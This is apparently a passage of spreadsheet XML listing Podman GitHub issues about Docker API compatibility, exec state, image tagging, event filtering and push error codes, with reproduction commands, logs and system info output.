    <t>Two slightly different variants. Possibly a race in the test itself:  not ok 1202 [80-kube] POST libpod/play/kube : status # expected: 200 # actual: 500 # response: {"cause":"pod already exists", "message":"playing YAML file: adding pod to state: name \"peacefulgoldberg-pod\" is in use: pod already exists", "response":500}  and  # response: {"cause":"pod already exists", "message":"playing YAML file: encountered while bringing up pod modestfeistel-pod-deployment-pod: adding pod to state: name \"modestfeistel-pod-deployment-pod\" is in use: pod already exists", "response":500}   [APIv2] [80-kube] POST libpod/play/kube : status * fedora-37 : APIv2 test on fedora-37 (rootless) * PR #17993 * [04-03 14:43](https://api.cirrus-ci.com/v1/task/6489412033314816/logs/main.log#t--01209) * PR #17925 * [03-25 06:39](https://api.cirrus-ci.com/v1/task/5563134824415232/logs/main.log#t--01202)</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/18092</t>
  </si>
  <si>
    <t>Image Filtering Incompatability with Docker API</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description Attempting to filter images by label value via the compat HTTP API doesn't find images that definitely exist with the set labels. The same requests with the docker socket (after the same set of calls to create a labeled image) do return images. There seems to be something about a new and old format for filters, this seems to only apply to how the new filters are handled.  Steps to reproduce the issue 1. run `podman image pull docker.io/ubuntu:22.04` 2. run:  curl --unix-socket /run/user/1000/podman/podman.sock --get 'http://_/images/json' \ --data-urlencode 'filters={"label": ["org.opencontainers.image.ref.name=ubuntu", "org.opencontainers.image.version=22.04"]}'   Describe the results you received This returns `[]`.  Describe the results you expected I would expect this to return the same thing as:  curl --unix-socket /run/user/1000/podman/podman.sock --get 'http://_/images/json' \ --data-urlencode 'filters={"label": {"org.opencontainers.image.ref.name=ubuntu":true, "org.opencontainers.image.version=22.04": true}}'  Which returns:  [ { "Id": "sha256:08d22c0ceb150ddeb2237c5fa3129c0183f3cc6f5eeb2e7aa4016da3ad02140a", "ParentId": "", "RepoTags": [ "docker.io/library/ubuntu:22.04", "docker.io/library/ubuntu:latest" ], "RepoDigests": [ "docker.io/library/ubuntu@sha256:67211c14fa74f070d27cc59d69a7fa9aeff8e28ea118ef3babc295a0428a6d21", "docker.io/library/ubuntu@sha256:7a57c69fe1e9d5b97c5fe649849e79f2cfc3bf11d10bbd5218b4eb61716aebe6" ], "Created": 1678250667, "Size": 80337591, "SharedSize": 0, "VirtualSize": 80337591, "Labels": { "org.opencontainers.image.ref.name": "ubuntu", "org.opencontainers.image.version": "22.04" }, "Containers": 496, "Names": [ "docker.io/library/ubuntu:22.04", "docker.io/library/ubuntu:latest" ], "Digest": "sha256:67211c14fa74f070d27cc59d69a7fa9aeff8e28ea118ef3babc295a0428a6d21", "History": [ "docker.io/library/ubuntu:latest", "docker.io/library/ubuntu:22.04" ] } ]   podman info output yaml Client: Podman Engine Version: 4.4.2 API Version: 4.4.2 Go Version: go1.19.6 Built: Wed Mar 1 05:22:59 2023 OS/Arch: linux/amd64   Podman in a container No  Privileged Or Rootless Rootless  Upstream Latest Release No  Additional environment details _No response_  Additional information When the above commands are run, but for the docker command/socket, both curl calls result in the same output.</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/18424</t>
  </si>
  <si>
    <t>Podman ExecIDs report inaccurate Running state.</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description It seems that podman ExecIDs are persisting and reporting as "running" for ~5 minutes before being removed. I've only tested this using the podman Golang bindings. Here is a demonstration program: https://gist.github.com/AndroidKitKat/2e1233b17316d96173fe1cf9f3e8aa48  Steps to reproduce the issue Steps to reproduce the issue 1. Create a new container  podman create --name alpine-test --tty alpine:latest  2. Start the container  podman start alpine-test  3. Start an exec in the container using the REST API. I did this using the Go program referenced in the GitHub Gist above I compiled it by doing:  go mod init inspectbug curl "https://gist.githubusercontent.com/AndroidKitKat/2e1233b17316d96173fe1cf9f3e8aa48/raw/40c2b071a53275d0e270d71aee34051140094e46/main.go" &gt; main.go go get go build ./inspectbug   Describe the results you received In that file, I have an Exec with the command `sleep 5` and I have a loop running checking the status of the Exec every 1 second. For a duration of 5 seconds (the duration of the sleep command) + 5 minutes, the `inspectResult` struct's `Running` member is `true`, until eventually the program crashes due to no error handling when checking `containers.ExecInspect` because the ExecID seems to no longer exist at all. Here's the output of the program:  [developer@guthix inspectbug]$ ./inspectbug 2023/05/02 14:12:21 Exec ID: 20ed50eb719cd691259d66de361be5793ac1f6d70179d5ef6978fbb72adf0c76 2023/05/02 14:12:21 Still running: 20ed50eb719cd691259d66de361be5793ac1f6d70179d5ef6978fbb72adf0c76  2023/05/02 14:17:23 Still running: 20ed50eb719cd691259d66de361be5793ac1f6d70179d5ef6978fbb72adf0c76 2023/05/02 14:17:24 Still running: 20ed50eb719cd691259d66de361be5793ac1f6d70179d5ef6978fbb72adf0c76 2023/05/02 14:17:25 Still running: 20ed50eb719cd691259d66de361be5793ac1f6d70179d5ef6978fbb72adf0c76 panic: runtime error: invalid memory address or nil pointer dereference [signal SIGSEGV: segmentation violation code=0x1 addr=0x43 pc=0xe79322]   Describe the results you expected After 5 seconds, the Exec shows as "Not running" due to sleep exiting.  podman info output yaml [developer@guthix inspectbug]$ podman info host: arch: amd64 buildahVersion: 1.27.3 cgroupControllers: [] cgroupManager: cgroupfs cgroupVersion: v1 conmon: package: conmon-2.1.4-1.module+el8.7.0+1154+147ffa21.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.4, commit: ddbeffc1e2a247aef04a1be0bc9b1b5ef5f1cd09' cpuUtilization: idlePercent: 99.9 systemPercent: 0.04 userPercent: 0.06 cpus: 8 distribution: distribution: '"rocky"' version: "8.7" eventLogger: file hostname: guthix idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 kernel: 4.18.0-425.19.2.el8_7.x86_64 linkmode: dynamic logDriver: k8s-file memFree: 27185180672 memTotal: 33146671104 networkBackend: cni ociRuntime: name: runc package: runc-1.1.4-1.module+el8.7.0+1154+147ffa21.x86_64 path: /usr/bin/runc version: |- runc version 1.1.4 spec: 1.0.2-dev go: go1.18.9 libseccomp: 2.5.2 os: linux remoteSocket: exists: true path: /run/user/1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_NET_RAW,CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-2.module+el8.7.0+1154+147ffa21.x86_64 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.4.0 SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.5.2 swapFree: 16741560320 swapTotal: 16741560320 uptime: 100h 45m 33.00s (Approximately 4.17 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - registry.access.redhat.com - registry.redhat.io - docker.io store: configFile: /home/developer/.config/containers/storage.conf containerStore: number: 7 paused: 0 running: 7 stopped: 0 graphDriverName: overlay graphOptions: overlay.mount_program: Executable: /usr/bin/fuse-overlayfs Package: fuse-overlayfs-1.9-1.module+el8.7.0+1154+147ffa21.x86_64 Version: |- fusermount3 version: 3.3.0 fuse-overlayfs: version 1.9 FUSE library version 3.3.0 using FUSE kernel interface version 7.26 graphRoot: /storage/containers/storage graphRootAllocated: 502921392128 graphRootUsed: 1801228288 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "false" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 9 runRoot: /run/user/1000 volumePath: /storage/containers/storage/volumes version: APIVersion: 4.2.0 Built: 1677003394 BuiltTime: Tue Feb 21 13:16:34 2023 GitCommit: "" GoVersion: go1.18.9 Os: linux OsArch: linux/amd64 Version: 4.2.0   Podman in a container No  Privileged Or Rootless Rootless  Upstream Latest Release No  Additional environment details Running on bare metal on Intel NUCs with 11th gen Intel processors. I am accessing Podman using the golang bindings.  Additional information I verified that the sleep command exits by looking at the process list of the container.</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/18597</t>
  </si>
  <si>
    <t>API endpoint /images/create seems to ignore the tag parameter?</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description Hey there. This issue originated when trying to use Podman as a backend for GitLab Runner. The issue presented itself when GitLab Runner was attempting to pull images for performing builds as can be seen by some of the log entries:  podman[400972]: Trying to pull registry.gitlab.com/gitlab-org/gitlab-runner/gitlab-runner-helper:x86_64-dcfb4b66 podman[400972]: @ - - [17/May/2023:10:50:23 +1000] "POST /v1.40/images/create?fromImage=registry.gitlab.com%2Fgitlab-org%2Fgitlab-runner%2Fgitlab-runner-helper&amp;tag=x86_64-dcfb4b66 HTTP/1.1" 200 284 "" "Go-http-client/1.1" podman[400972]: time="2023-05-17T10:50:23+10:00" level=info msg="Request Failed(Not Found): failed to find image registry.gitlab.com/gitlab-org/gitlab-runner/gitlab-runner-helper:x86_64-dcfb4b66: registry.gitlab.com/gitlab-org/gitlab-runner/gitlab-runner-helper:x86_64-dcfb4b66: No such image" podman[400972]: @ - - [17/May/2023:10:50:23 +1000] "GET /v1.40/images/registry.gitlab.com/gitlab-org/gitlab-runner/gitlab-runner-helper:x86_64-dcfb4b66/json HTTP/1.1" 404 441 "" "Go-http-client/1.1" gitlab-runner[400957]: WARNING: Failed to pull image with policy "if-not-present": Error response from daemon: failed to find image registry.gitlab.com/gitlab-org/gitlab-runner/gitlab-runner-helper:x86_64-dcfb4b66: registry.gitlab.com/gitlab-org/gitlab-runner/gitlab-runner-helper:x86_64-dcfb4b66: No such image (manager.go:241:0s) job=639118 project=39435 runner=r3KQ8vBa gitlab-runner[400957]: WARNING: Preparation failed: failed to pull image "registry.gitlab.com/gitlab-org/gitlab-runner/gitlab-runner-helper:x86_64-dcfb4b66" with specified policies [if-not-present]: Error response from daemon: failed to find image registry.gitlab.com/gitlab-org/gitlab-runner/gitlab-runner-helper:x86_64-dcfb4b66: registry.gitlab.com/gitlab-org/gitlab-runner/gitlab-runner-helper:x86_64-dcfb4b66: No such image (manager.go:241:0s) job=639118 project=39435 runner=r3KQ8vBa  After investigating this further, I can actually reproduce a difference in behaviour between Docker and the Podman Docker API which I believe is resulting in the issue. When hitting the `/images/create` API endpoint with a repo and tag parameter, Docker creates an image with the chosen name and tag while Podman seems to only use the name and set the tag to `latest`. More information is shown below with a repro.  Steps to reproduce the issue Steps to reproduce the issue 1. Ensure you have a system with both Podman and Docker available 2. Create an empty image using each and inspect the results as follows: bash me@myserver:~$ # Create an empty image with Docker. me@myserver:~$ curl -v -XPOST --unix-socket /run/docker.sock 'http:api/images/create?fromSrc=-&amp;repo=myimage&amp;tag=mytag' * Trying /run/docker.sock:0 * Connected to api (/run/docker.sock) port 80 (#0) &gt; POST /images/create?fromSrc=-&amp;repo=myimage&amp;tag=mytag HTTP/1.1 &gt; Host: api &gt; User-Agent: curl/7.81.0 &gt; Accept: */* &gt; * Mark bundle as not supporting multiuse &lt; HTTP/1.1 200 OK &lt; Api-Version: 1.41 &lt; Content-Type: application/json &lt; Docker-Experimental: false &lt; Ostype: linux &lt; Server: Docker/20.10.21 (linux) &lt; Date: Wed, 17 May 2023 06:51:16 GMT &lt; Transfer-Encoding: chunked &lt; {"status":"sha256:bb944196d717548f774e7d64da0c3b1ab9b567dcef3577d5db11c712b0eb8df1"} * Connection #0 to host api left intact me@myserver:~$ docker images REPOSITORY TAG IMAGE ID CREATED SIZE myimage mytag bb944196d717 6 seconds ago 0B me@myserver:~$ curl -v --unix-socket /run/docker.sock 'http://api/images/myimage:mytag/json' * Trying /run/docker.sock:0 * Connected to api (/run/docker.sock) port 80 (#0) &gt; GET /images/myimage:mytag/json HTTP/1.1 &gt; Host: api &gt; User-Agent: curl/7.81.0 &gt; Accept: */* &gt; * Mark bundle as not supporting multiuse &lt; HTTP/1.1 200 OK &lt; Api-Version: 1.41 &lt; Content-Type: application/json &lt; Docker-Experimental: false &lt; Ostype: linux &lt; Server: Docker/20.10.21 (linux) &lt; Date: Wed, 17 May 2023 06:51:26 GMT &lt; Content-Length: 1424 &lt; {"Id":"sha256:bb944196d717548f774e7d64da0c3b1ab9b567dcef3577d5db11c712b0eb8df1","RepoTags":["myimage:mytag"],"RepoDigests":[],"Parent":"","Comment":"Imported from -","Created":"2023-05-17T06:51:16.354773741Z","Container":"","ContainerConfig":{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"DockerVersion":"20.10.21","Author":"","Config":{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"Architecture":"amd64","Os":"linux","Size":0,"VirtualSize":0,"GraphDriver":{"Data":{"MergedDir":"/var/lib/docker/overlay2/669ba8d7a9fcdf7b1b321ec814400ec4df2964cfdc11c65a0d320afb7e288114/merged","UpperDir":"/var/lib/docker/overlay2/669ba8d7a9fcdf7b1b321ec814400ec4df2964cfdc11c65a0d320afb7e288114/diff","WorkDir":"/var/lib/docker/overlay2/669ba8d7a9fcdf7b1b321ec814400ec4df2964cfdc11c65a0d320afb7e288114/work"},"Name":"overlay2"},"RootFS":{"Type":"layers","Layers":["sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"]},"Metadata":{"LastTagTime":"2023-05-17T16:51:16.357888207+10:00"}} * Connection #0 to host api left intact me@myserver:~$ # Create an empty image with Podman. me@myserver:~$ curl -v -XPOST --unix-socket /run/user/1000/podman/podman.sock 'http:api/images/create?fromSrc=-&amp;repo=myimage&amp;tag=mytag' * Trying /run/user/1000/podman/podman.sock:0 * Connected to api (/run/user/1000/podman/podman.sock) port 80 (#0) &gt; POST /images/create?fromSrc=-&amp;repo=myimage&amp;tag=mytag HTTP/1.1 &gt; Host: api &gt; User-Agent: curl/7.81.0 &gt; Accept: */* &gt; * Mark bundle as not supporting multiuse &lt; HTTP/1.1 200 OK &lt; Api-Version: 1.41 &lt; Content-Type: application/json &lt; Libpod-Api-Version: 4.5.0 &lt; Server: Libpod/4.5.0 (linux) &lt; X-Reference-Id: 0xc0000c0490 &lt; Date: Wed, 17 May 2023 06:51:45 GMT &lt; Content-Length: 198 &lt; {"status":"sha256:b27eea98c26530caa6fbb4754d1dd08d401f5c839e0ae4068fff65be1668ddb1","progress":"","progressDetail":{},"id":"sha256:b27eea98c26530caa6fbb4754d1dd08d401f5c839e0ae4068fff65be1668ddb1"} * Connection #0 to host api left intact me@myserver:~$ podman images REPOSITORY TAG IMAGE ID CREATED SIZE docker.io/library/myimage latest b27eea98c265 3 seconds ago 1.09 kB me@myserver:~$ curl -v --unix-socket /run/user/1000/podman/podman.sock 'http://api/images/myimage:mytag/json' * Trying /run/user/1000/podman/podman.sock:0 * Connected to api (/run/user/1000/podman/podman.sock) port 80 (#0) &gt; GET /images/myimage:mytag/json HTTP/1.1 &gt; Host: api &gt; User-Agent: curl/7.81.0 &gt; Accept: */* &gt; * Mark bundle as not supporting multiuse &lt; HTTP/1.1 404 Not Found &lt; Api-Version: 1.41 &lt; Content-Type: application/json &lt; Libpod-Api-Version: 4.5.0 &lt; Server: Libpod/4.5.0 (linux) &lt; X-Reference-Id: 0xc0000c92a0 &lt; Date: Wed, 17 May 2023 06:51:59 GMT &lt; Content-Length: 205 &lt; {"cause":"failed to find image myimage:mytag: docker.io/library/myimage:mytag: No such image","message":"failed to find image myimage:mytag: docker.io/library/myimage:mytag: No such image","response":404} * Connection #0 to host api left intact   Describe the results you received As you can see, Docker creates the image `myimage:mytag` while Podman creates the image `docker.io/library/myimage:latest` where the tag has not been respected by Podman.  Describe the results you expected I expected Podman to create the image with the tag `mytag` as Docker does.  podman info output yaml host: arch: amd64 buildahVersion: 1.30.0 cgroupControllers: - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon_100:2.1.2~0_amd64 path: /usr/libexec/podman/conmon version: 'conmon version 2.1.2, commit: ' cpuUtilization: idlePercent: 99.08 systemPercent: 0.23 userPercent: 0.69 cpus: 4 databaseBackend: boltdb distribution: codename: jammy distribution: ubuntu version: "22.04" eventLogger: journald hostname: myserver.mydomain idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 kernel: 5.15.0-71-generic linkmode: dynamic logDriver: journald memFree: 7083307008 memTotal: 16753397760 networkBackend: cni ociRuntime: name: runc package: runc_1.1.0-0ubuntu1_amd64 path: /usr/sbin/runc version: |- runc version 1.1.0-0ubuntu1 spec: 1.0.2-dev go: go1.17.3 libseccomp: 2.5.3 os: linux remoteSocket: exists: true path: /run/user/1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns_1.0.1-2_amd64 version: |- slirp4netns version 1.0.1 commit: 6a7b16babc95b6a3056b33fb45b74a6f62262dd4 libslirp: 4.6.1 swapFree: 4294963200 swapTotal: 4294963200 uptime: 314h 16m 0.00s (Approximately 13.08 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - docker.io - quay.io store: configFile: /home/me/.config/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /home/me/.local/share/containers/storage graphRootAllocated: 103240073216 graphRootUsed: 48463527936 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 1 runRoot: /run/user/1000/containers transientStore: false volumePath: /home/me/.local/share/containers/storage/volumes version: APIVersion: 4.5.0 Built: 0 BuiltTime: Thu Jan 1 10:00:00 1970 GitCommit: "" GoVersion: go1.18.1 Os: linux OsArch: linux/amd64 Version: 4.5.0   Podman in a container No  Privileged Or Rootless Rootless  Upstream Latest Release Yes  Additional environment details I've replicated this problem on various versions of Podman ranging from 3.4.4 to the latest on both Ubuntu 22.04 and AlmaLinux 9.  Additional information Additional information like issue happens only occasionally or issue happens with a particular architecture or on a particular setting</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/18618</t>
  </si>
  <si>
    <t>podman events --filter doesn't work for "volume" as a key</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description The command `podman events --filter volume=volume-name` does not print any events  Steps to reproduce the issue Steps to reproduce the issue Open two terminals: 1. podman events --filter volume=volume-name 2. podman volume create volume-name  Describe the results you received No event was created  Describe the results you expected An event should have been printed  podman info output yaml $ podman version Client: Podman Engine Version: 4.5.0 API Version: 4.5.0 Go Version: go1.20.2 Built: Fri Apr 14 21:12:22 2023 OS/Arch: linux/amd64   $ podman info host: arch: amd64 buildahVersion: 1.30.0 cgroupControllers: - cpu - io - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.7-2.fc38.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.7, commit: ' cpuUtilization: idlePercent: 94.82 systemPercent: 1.74 userPercent: 3.44 cpus: 20 databaseBackend: boltdb distribution: distribution: fedora variant: workstation version: "38" eventLogger: journald hostname: fedora idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 524288 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 524288 size: 65536 kernel: 6.2.14-300.fc38.x86_64 linkmode: dynamic logDriver: journald memFree: 48852434944 memTotal: 67070021632 networkBackend: netavark ociRuntime: name: crun package: crun-1.8.4-1.fc38.x86_64 path: /usr/bin/crun version: |- crun version 1.8.4 commit: 5a8fa99a5e41facba2eda4af12fa26313918805b rundir: /run/user/1000/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux remoteSocket: path: /run/user/1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-12.fc38.x86_64 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 8589930496 swapTotal: 8589930496 uptime: 27h 41m 11.00s (Approximately 1.12 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io - quay.io store: configFile: /home/gvyas/.config/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /home/gvyas/.local/share/containers/storage graphRootAllocated: 523214258176 graphRootUsed: 20388020224 graphStatus: Backing Filesystem: btrfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 53 runRoot: /run/user/1000/containers transientStore: false volumePath: /home/gvyas/.local/share/containers/storage/volumes version: APIVersion: 4.5.0 Built: 1681486942 BuiltTime: Fri Apr 14 21:12:22 2023 GitCommit: "" GoVersion: go1.20.2 Os: linux OsArch: linux/amd64 Version: 4.5.0    Podman in a container No  Privileged Or Rootless None  Upstream Latest Release Yes  Additional environment details _No response_  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/18751</t>
  </si>
  <si>
    <t>docker API returns 200 on push even if it fails</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description docker API returns 200 on push even if it fails  Steps to reproduce the issue Steps to reproduce the issue 1. try to push a image to a private repository 2. the repository has to reject the push 3. podman logs the rejection as error and retries  Describe the results you received 4. podman confirms the push on the API with status 200  Describe the results you expected 4. podman should error on the API with status range reflecting the push error (e.g. 403)  podman info output yaml host: arch: amd64 buildahVersion: 1.30.0 cgroupControllers: - cpuset - cpu - io - memory - hugetlb - pids - misc cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.7-2.fc37.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.7, commit: ' cpuUtilization: idlePercent: 97.99 systemPercent: 0.4 userPercent: 1.6 cpus: 16 databaseBackend: boltdb distribution: distribution: fedora variant: kde version: "37" eventLogger: journald hostname: thinkpad idMappings: gidmap: null uidmap: null kernel: 6.3.0-63.fc39.x86_64 linkmode: dynamic logDriver: journald memFree: 1388929024 memTotal: 29224398848 networkBackend: cni ociRuntime: name: crun package: crun-1.8.4-1.fc37.x86_64 path: /usr/bin/crun version: |- crun version 1.8.4 commit: 5a8fa99a5e41facba2eda4af12fa26313918805b rundir: /run/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux remoteSocket: exists: true path: /run/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-8.fc37.x86_64 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 7802028032 swapTotal: 8589930496 uptime: 235h 31m 12.00s (Approximately 9.79 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io - quay.io store: configFile: /usr/share/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphRootAllocated: 201769652224 graphRootUsed: 99855040512 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "false" Supports d_type: "true" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 4 runRoot: /run/containers/storage transientStore: false volumePath: /var/lib/containers/storage/volumes version: APIVersion: 4.5.0 Built: 1681486976 BuiltTime: Fri Apr 14 17:42:56 2023 GitCommit: "" GoVersion: go1.19.7 Os: linux OsArch: linux/amd64 Version: 4.5.0  Output from `journalctl -u podman`  May 31 11:02:12 thinkpad podman[498506]: @ - - [31/May/2023:11:02:12 +0200] "POST /build?t=my.private.registry.local%2Fmy.image%2Fmessenger%3A0.0.1&amp;dockerfile=Containerfile&amp;rm=true HTTP/1.1" 200 1527 "" "Apache-HttpClient/5.0.3 (Java/17.0.6)" May 31 11:02:12 thinkpad podman[498506]: time="2023-05-31T11:02:12+02:00" level=warning msg="Failed, retrying in 1s  (1/3). Error: writing blob: initiating layer upload to /v2/my.image/messenger/blobs/uploads/ in my.private.registry.local: unknown: Unable to upload into a virtual repository without default local deployment configured." May 31 11:02:14 thinkpad podman[498506]: time="2023-05-31T11:02:14+02:00" level=warning msg="Failed, retrying in 1s  (2/3). Error: writing blob: initiating layer upload to /v2/my.image/messenger/blobs/uploads/ in my.private.registry.local: unknown: Unable to upload into a virtual repository without default local deployment configured." May 31 11:02:15 thinkpad podman[498506]: time="2023-05-31T11:02:15+02:00" level=warning msg="Failed, retrying in 1s  (3/3). Error: writing blob: initiating layer upload to /v2/my.image/messenger/blobs/uploads/ in my.private.registry.local: unknown: Unable to upload into a virtual repository without default local deployment configured." May 31 11:02:17 thinkpad podman[498506]: @ - - [31/May/2023:11:02:12 +0200] "POST /images/my.private.registry.local%2Fmy.image%2Fmessenger:0.0.1/push HTTP/1.1" 200 671 "" "Apache-HttpClient/5.0.3 (Java/17.0.6)" May 31 11:02:17 thinkpad podman[498506]: 2023-05-31 11:02:12.320654708 +0200 CEST m=+6.087204790 image push 1d8a277aac651f36677366edc062de55ca26db8821309c6cece21710418f7df0 my.private.registry.local/my.image/messenger:0.0.1  Output from `podman version` (Fedora 37):  [root@thinkpad hargut]# podman version Client: Podman Engine Version: 4.5.0 API Version: 4.5.0 Go Version: go1.19.7 Built: Fri Apr 14 17:42:56 2023 OS/Arch: linux/amd64 [root@thinkpad hargut]# rpm -q podman podman-4.5.0-1.fc37.x86_64 [root@thinkpad hargut]#   Podman in a container No  Privileged Or Rootless Privileged  Upstream Latest Release No  Additional environment details Additional environment details  Additional information Additional information like issue happens only occasionally or issue happens with a particular architecture or on a particular setting</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/18792</t>
  </si>
  <si>
    <t>Running containers without defined or disabled health checks should not return "Health": {}</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description When running a container with podman that does not define any health check, the following state is returned.  Steps to reproduce the issue Steps to reproduce the issue 1. Run podman with disabled or no health checks in place  podman run --no-healthcheck -e POSTGRES_PASSWORD=password postgres:9.5 or since this image seems not to define any check podman run -e POSTGRES_PASSWORD=password postgres:9.5  2. Check the state  podman inspect $cid "Health": { "Status": "", "FailingStreak": 0, "Log": null },   Describe the results you received  podman inspect $cid "Health": { "Status": "", "FailingStreak": 0, "Log": null },   Describe the results you expected As with docker, I would expect that there is no "Health": section in the first place to indicate that this container is not running any health checks  podman info output yaml podman info host: arch: arm64 buildahVersion: 1.30.0 cgroupControllers: - cpu - io - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.7-2.fc38.aarch64 path: /usr/bin/conmon version: 'conmon version 2.1.7, commit: ' cpuUtilization: idlePercent: 91.22 systemPercent: 2.77 userPercent: 6.01 cpus: 1 databaseBackend: boltdb distribution: distribution: fedora variant: coreos version: "38" eventLogger: journald hostname: localhost.localdomain idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 1000000 uidmap: - container_id: 0 host_id: 501 size: 1 - container_id: 1 host_id: 100000 size: 1000000 kernel: 6.2.15-300.fc38.aarch64 linkmode: dynamic logDriver: journald memFree: 363335680 memTotal: 2049069056 networkBackend: netavark ociRuntime: name: crun package: crun-1.8.5-1.fc38.aarch64 path: /usr/bin/crun version: |- crun version 1.8.5 commit: b6f80f766c9a89eb7b1440c0a70ab287434b17ed rundir: /run/user/501/crun spec: 